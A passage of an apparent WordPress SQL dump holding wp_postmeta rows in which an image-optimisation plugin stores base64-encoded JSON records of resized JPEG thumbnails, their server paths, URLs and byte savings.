BlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NTcsInRpbWUiOjE0ODM1ODQ4ODgsImlkIjo2ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjEsInRpbWUiOjE0ODM1ODQ4OTEsImlkIjo2ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MzcsInRpbWUiOjE0ODM1ODQ4OTUsImlkIjo2ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODc2LCJ0aW1lIjoxNDgzNTg0ODk4LCJpZCI6Njg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjozODQsInRpbWUiOjE0ODM1ODQ5MDEsImlkIjo2ODZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQyMCwidGltZSI6MTQ4MzU4NDkwNSwiaWQiOjY4Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTY0LCJ0aW1lIjoxNDgzNTg0OTA4LCJpZCI6Njg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1ODIsInRpbWUiOjE0ODM1ODQ5MTEsImlkIjo2ODZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjc4OSwidGltZSI6MTQ4MzU4NDkxNSwiaWQiOjY4Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (30107, 685, 'wpfc_optimisation_reduction', '10548'); 
INSERT INTO `wp_postmeta` VALUES (30108, 685, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzkuanBnIiwid2lkdGgiOjYwMDAsImhlaWdodCI6NDAwNCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDkxOSwiaWQiOiI2ODUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTgwLCJ0aW1lIjoxNDgzNTg0OTIzLCJpZCI6Njg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MTAxNywidGltZSI6MTQ4MzU4NDkyNywiaWQiOjY4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS03Njh4NTEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktNzY4eDUxMy5qcGciLCJyZWR1Y3Rpb24iOjk4NiwidGltZSI6MTQ4MzU4NDkzMSwiaWQiOjY4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6Mjk3MywidGltZSI6MTQ4MzU4NDkzNywiaWQiOjY4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUyOCwidGltZSI6MTQ4MzU4NDk0MCwiaWQiOjY4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQzOCwidGltZSI6MTQ4MzU4NDk0MywiaWQiOjY4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ5OCwidGltZSI6MTQ4MzU4NDk0NiwiaWQiOjY4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjkzMCwidGltZSI6MTQ4MzU4NDk1MCwiaWQiOjY4NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDI5LCJ0aW1lIjoxNDgzNTg0OTU0LCJpZCI6Njg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0NTEsInRpbWUiOjE0ODM1ODQ5NTcsImlkIjo2ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjUzNiwidGltZSI6MTQ4MzU4NDk2MSwiaWQiOjY4NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTQ0LCJ0aW1lIjoxNDgzNTg0OTY0LCJpZCI6Njg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE3ODAxMjM3OS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNzgwMTIzNzktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTc4MDEyMzc5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo2MzgsInRpbWUiOjE0ODM1ODQ5NjgsImlkIjo2ODV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30109, 684, 'wpfc_optimisation_reduction', '14350'); 
INSERT INTO `wp_postmeta` VALUES (30110, 684, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzguanBnIiwid2lkdGgiOjU3NTgsImhlaWdodCI6MzgzOCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDk3MywiaWQiOiI2ODQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzU3LCJ0aW1lIjoxNDgzNTg0OTc2LCJpZCI6Njg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTQ2MiwidGltZSI6MTQ4MzU4NDk4MSwiaWQiOjY4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL